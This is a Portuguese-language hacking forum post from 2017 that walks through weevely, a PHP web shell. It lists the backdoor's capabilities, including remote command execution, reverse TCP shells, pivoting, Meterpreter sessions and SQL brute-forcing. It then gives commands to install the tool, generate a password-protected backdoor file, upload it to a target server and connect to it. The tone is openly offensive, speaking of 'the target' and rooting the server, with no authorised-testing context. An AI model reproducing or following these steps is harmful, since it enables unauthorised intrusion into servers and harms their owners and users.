BackdoorWeb + Meterpreter + Pivot +...

Post Reply
fireblood
Noob
Posts: 1
Joined: Tue Dec 05, 2017 1:52 am
x 1

BackdoorWeb + Meterpreter + Pivot +...

Post by fireblood » Fri Dec 08, 2017 7:29 pm

Fala rapazeada, hoje estarei falando do weevely.
Uma ferramenta com ótima utilidade desenvolvida em python.

O weevely funciona assim,
com apenas um upload do arquivo você têm acesso a todas as utilidades abaixo:

1- Rodar comandos no servidor pelo terminal
2- Pivot SQL Console.
3- Proxy HTTP traffic no alvo.
4- Audit Remote
5- Mount the remote filesystem
6- Pivot Port Scan
7- Upload and Download files
8- Criar reverse e direct TCP Shell
9- Mudar para uma Meterpreter Session.
10- Bruteforce nas contas SQL
11- Administrar arquivos comprenssados nativos.

Ao contrário das shell que as pessoas costumam usar em ataques web, essa é totalmente pelo terminal.
Sendo mais fácil de rootar o servidor, fazer pivot, e etc...

Enfim, vamos começar instalando a ferramenta!

$ git clone https://github.com/epinna/weevely3.git
$ sudo apt-get install g++ python-pip libyaml-dev python-dev libncurses5-dev
$ cd weevely3
$ sudo pip install -r requirements.txt --upgrade

Agora, vamos ver como funciona a ferramenta!

$ ./weevely.py generate senha weevely.php

No lugar de senha, digite a senha de preferencia sua, e em weevely.php mude para um nome de arquivo de sua preferencia.
No caso acima geramos o arquivo weevely.php com a senha "senha".

Agora é só fazer o upload do weevely.php no nosso alvo.

Após fazer o upload..!

$ ./weevely.py http://alvo.com/arquivos/weevely.php senha

Executamos o weevely e adicionamos o link de nossa shell do weevely e depois a senha escolhida anteriormente.
E pronto!

Bom Hacking.
1 x

Post Reply